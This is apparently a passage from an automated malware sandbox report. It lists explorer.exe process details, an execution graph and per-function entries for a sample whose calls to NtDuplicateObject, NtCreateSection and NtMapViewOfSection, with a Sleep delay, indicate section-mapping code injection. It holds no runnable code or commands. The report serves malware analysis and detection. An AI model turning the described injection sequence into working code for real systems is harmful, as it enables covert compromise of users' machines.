                      Start date:28/05/2024
                      Path:C:\Windows\SysWOW64\explorer.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\explorer.exe
                      Imagebase:0x860000
                      File size:4'514'184 bytes
                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:false

                      General

                      Target ID:17
                      Start time:02:24:08
                      Start date:28/05/2024
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\explorer.exe
                      Imagebase:0x7ff72b770000
                      File size:5'141'208 bytes
                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:7.6%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:50%
                        Total number of Nodes:48
                        Total number of Limit Nodes:1
                        execution_graph 2063 402d65 2066 402d69 2063->2066 2064 402ea5 2065 4018a6 8 API calls 2065->2064 2066->2064 2066->2065 2141 4018b1 2142 401903 2141->2142 2144 4018b5 2141->2144 2143 4014bf 7 API calls 2142->2143 2146 40191a 2142->2146 2143->2146 2145 4018ee Sleep 2144->2145 2145->2142 2087 4014d6 2088 4014c4 2087->2088 2089 40156f NtDuplicateObject 2088->2089 2097 40168b 2088->2097 2090 40158c NtCreateSection 2089->2090 2089->2097 2091 4015b2 NtMapViewOfSection 2090->2091 2092 40160c NtCreateSection 2090->2092 2091->2092 2093 4015d5 NtMapViewOfSection 2091->2093 2094 401638 2092->2094 2092->2097 2093->2092 2095 4015f3 2093->2095 2096 401642 NtMapViewOfSection 2094->2096 2094->2097 2095->2092 2096->2097 2098 401669 NtMapViewOfSection 2096->2098 2098->2097 2041 402dfe 2042 402dee 2041->2042 2044 402ea5 2042->2044 2045 4018a6 2042->2045 2046 4018b7 2045->2046 2047 4018ee Sleep 2046->2047 2048 401903 2047->2048 2050 40191a 2048->2050 2051 4014bf 2048->2051 2050->2044 2052 4014ce 2051->2052 2053 40168b 2052->2053 2054 40156f NtDuplicateObject 2052->2054 2053->2050 2054->2053 2055 40158c NtCreateSection 2054->2055 2056 4015b2 NtMapViewOfSection 2055->2056 2057 40160c NtCreateSection 2055->2057 2056->2057 2058 4015d5 NtMapViewOfSection 2056->2058 2057->2053 2059 401638 2057->2059 2058->2057 2060 4015f3 2058->2060 2059->2053 2061 401642 NtMapViewOfSection 2059->2061 2060->2057 2061->2053 2062 401669 NtMapViewOfSection 2061->2062 2062->2053 2147 4018be 2148 4018b7 2147->2148 2149 4018ee Sleep 2148->2149 2150 401903 2149->2150 2151 4014bf 7 API calls 2150->2151 2152 40191a 2150->2152 2151->2152

                        Executed Functions

                        Function 004014D6 Relevance: 10.8, APIs: 7, Instructions: 253nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 4014d6-4014d7 1 4014c4-4014c8 0->1 2 4014d8-401519 call 401164 0->2 1->2 13 40151b 2->13 14 40151e-401523 2->14 13->14 16 401529-40153a 14->16 17 40184d-401855 14->17 21 401540-401569 16->21 22 40184b 16->22 17->14 20 40185a-401883 17->20 30 401874-40187f 20->30 31 401886-4018a3 call 401164 20->31 21->22 29 40156f-401586 NtDuplicateObject 21->29 22->20 29->22 32 40158c-4015b0 NtCreateSection 29->32 30->31 34 4015b2-4015d3 NtMapViewOfSection 32->34 35 40160c-401632 NtCreateSection 32->35 34->35 37 4015d5-4015f1 NtMapViewOfSection 34->37 35->22 38 401638-40163c 35->38 37->35 41 4015f3-401609 37->41 38->22 42 401642-401663 NtMapViewOfSection 38->42 41->35 42->22 44 401669-401685 NtMapViewOfSection 42->44 44->22 46 40168b call 401690 44->46
                        APIs
                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: Section$CreateDuplicateObjectView
                        • String ID:
                        • API String ID: 1652636561-0
                        • Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                        • Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
                        • Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                        • Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64
                        Function 004014BF Relevance: 10.7, APIs: 7, Instructions: 204nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 48 4014bf-4014c8 49 4014d8 48->49 50 4014ce-401519 call 401164 48->50 49->50 60 40151b 50->60 61 40151e-401523 50->61 60->61 63 401529-40153a 61->63 64 40184d-401855 61->64 68 401540-401569 63->68 69 40184b 63->69 64->61 67 40185a-401883 64->67 77 401874-40187f 67->77 78 401886-4018a3 call 401164 67->78 68->69 76 40156f-401586 NtDuplicateObject 68->76 69->67 76->69 79 40158c-4015b0 NtCreateSection 76->79 77->78 81 4015b2-4015d3 NtMapViewOfSection 79->81 82 40160c-401632 NtCreateSection 79->82 81->82 84 4015d5-4015f1 NtMapViewOfSection 81->84 82->69 85 401638-40163c 82->85 84->82 88 4015f3-401609 84->88 85->69 89 401642-401663 NtMapViewOfSection 85->89 88->82 89->69 91 401669-401685 NtMapViewOfSection 89->91 91->69 93 40168b call 401690 91->93
                        APIs
                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: Section$View$Create$DuplicateObject
                        • String ID:
                        • API String ID: 1546783058-0
                        • Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                        • Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
                        • Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                        • Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65
                        Function 004014E8 Relevance: 10.7, APIs: 7, Instructions: 168nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 95 4014e8 96 4014e0-4014e5 95->96 97 4014ec-401519 call 401164 95->97 96->97 103 40151b 97->103 104 40151e-401523 97->104 103->104 106 401529-40153a 104->106 107 40184d-401855 104->107 111 401540-401569 106->111 112 40184b 106->112 107->104 110 40185a-401883 107->110 120 401874-40187f 110->120 121 401886-4018a3 call 401164 110->121 111->112 119 40156f-401586 NtDuplicateObject 111->119 112->110 119->112 122 40158c-4015b0 NtCreateSection 119->122 120->121 124 4015b2-4015d3 NtMapViewOfSection 122->124 125 40160c-401632 NtCreateSection 122->125 124->125 127 4015d5-4015f1 NtMapViewOfSection 124->127 125->112 128 401638-40163c 125->128 127->125 131 4015f3-401609 127->131 128->112 132 401642-401663 NtMapViewOfSection 128->132 131->125 132->112 134 401669-401685 NtMapViewOfSection 132->134 134->112 136 40168b call 401690 134->136
                        APIs
                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: Section$View$Create$DuplicateObject
                        • String ID:
                        • API String ID: 1546783058-0
                        • Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                        • Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
                        • Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                        • Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24
                        Function 004014EB Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 138 4014eb-401519 call 401164 143 40151b 138->143 144 40151e-401523 138->144 143->144 146 401529-40153a 144->146 147 40184d-401855 144->147 151 401540-401569 146->151 152 40184b 146->152 147->144 150 40185a-401883 147->150 160 401874-40187f 150->160 161 401886-4018a3 call 401164 150->161 151->152 159 40156f-401586 NtDuplicateObject 151->159 152->150 159->152 162 40158c-4015b0 NtCreateSection 159->162 160->161 164 4015b2-4015d3 NtMapViewOfSection 162->164 165 40160c-401632 NtCreateSection 162->165 164->165 167 4015d5-4015f1 NtMapViewOfSection 164->167 165->152 168 401638-40163c 165->168 167->165 171 4015f3-401609 167->171 168->152 172 401642-401663 NtMapViewOfSection 168->172 171->165 172->152 174 401669-401685 NtMapViewOfSection 172->174 174->152 176 40168b call 401690 174->176
                        APIs
                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: Section$View$Create$DuplicateObject
                        • String ID:
                        • API String ID: 1546783058-0
                        • Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                        • Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
                        • Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                        • Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64
                        Function 004018C5 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 178 4018c5-40190b call 401164 Sleep call 4013cc 188 40191a-401920 178->188 189 40190d-401915 call 4014bf 178->189 192 401931 188->192 193 401928-40192d 188->193 189->188 192->193 194 401934-40194f 192->194 193->194 199 401952-40195b call 401164 194->199 200 401948-40194b 194->200 200->199
                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: CreateDuplicateObjectSectionSleep
                        • String ID: zOji
                        • API String ID: 4152845823-4118548424
                        • Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                        • Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
                        • Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                        • Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B
                        Function 004018A6 Relevance: 1.3, APIs: 1, Instructions: 61sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 203 4018a6-4018c3 207 4018d4 203->207 208 4018c8-40190b call 401164 Sleep call 4013cc 203->208 207->208 218 40191a-401920 208->218 219 40190d-401915 call 4014bf 208->219 222 401931 218->222 223 401928-40192d 218->223 219->218 222->223 224 401934-40194f 222->224 223->224 229 401952-40195b call 401164 224->229 230 401948-40194b 224->230 230->229
                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: CreateDuplicateObjectSectionSleep
                        • String ID:
                        • API String ID: 4152845823-0
                        • Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                        • Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
                        • Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                        • Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F
                        Function 004018BE Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 233 4018be-4018c3 237 4018d4 233->237 238 4018c8-40190b call 401164 Sleep call 4013cc 233->238 237->238 248 40191a-401920 238->248 249 40190d-401915 call 4014bf 238->249 252 401931 248->252 253 401928-40192d 248->253 249->248 252->253 254 401934-40194f 252->254 253->254 259 401952-40195b call 401164 254->259 260 401948-40194b 254->260 260->259
                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: CreateDuplicateObjectSectionSleep
                        • String ID:
                        • API String ID: 4152845823-0
                        • Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                        • Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
                        • Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                        • Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B
                        Function 004018B1 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 263 4018b1-4018b3 264 401903-40190b call 4013cc 263->264 265 4018b5-4018c3 263->265 271 40191a-401920 264->271 272 40190d-401915 call 4014bf 264->272 269 4018d4 265->269 270 4018c8-401900 call 401164 Sleep 265->270 269->270 270->264 278 401931 271->278 279 401928-40192d 271->279 272->271 278->279 281 401934-40194f 278->281 279->281 288 401952-40195b call 401164 281->288 289 401948-40194b 281->289 289->288
                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                        • Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
                        • Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                        • Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B
                        Function 004018C2 Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 292 4018c2-40190b call 401164 Sleep call 4013cc 304 40191a-401920 292->304 305 40190d-401915 call 4014bf 292->305 308 401931 304->308 309 401928-40192d 304->309 305->304 308->309 310 401934-40194f 308->310 309->310 315 401952-40195b call 401164 310->315 316 401948-40194b 310->316 316->315
                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: CreateDuplicateObjectSectionSleep
                        • String ID:
                        • API String ID: 4152845823-0
                        • Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                        • Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
                        • Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                        • Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B
                        Function 004018DA Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 319 4018da-40190b call 401164 Sleep call 4013cc 326 40191a-401920 319->326 327 40190d-401915 call 4014bf 319->327 330 401931 326->330 331 401928-40192d 326->331 327->326 330->331 332 401934-40194f 330->332 331->332 337 401952-40195b call 401164 332->337 338 401948-40194b 332->338 338->337
                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: CreateDuplicateObjectSectionSleep
                        • String ID:
                        • API String ID: 4152845823-0
                        • Opcode ID: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                        • Instruction ID: 8f9a98739febab8b32419077b991bda00f1387bd451c7178a571841fb0c6b49c
                        • Opcode Fuzzy Hash: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                        • Instruction Fuzzy Hash: A8F044B6204205EBDB006E959C51FAE3768AB44725F344133F612790F1C67D8A52F71B

                        Non-executed Functions

                        Function 004022D9 Relevance: .1, Instructions: 73COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                        • Instruction ID: 407047d8813846ed623c6620c5c661c30d6a874651c06bbb2e7ade0d14a7dce7
                        • Opcode Fuzzy Hash: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                        • Instruction Fuzzy Hash: 92117D2020C541FCD321D27CCA0C911BFA99B4F72075401FBD691250C3DAB9094AEBAB
                        Function 004022D8 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                        • Instruction ID: 5db6927ec116302fd1a3f9be718c7712ee400501de5b38768fcc91fc62191cbb
                        • Opcode Fuzzy Hash: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                        • Instruction Fuzzy Hash: 56117D2024C581ECD321D37CCA48914BFA69B4F72076801FBD691694C3CAB9454AEBAB
                        Function 004022E5 Relevance: .1, Instructions: 68COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
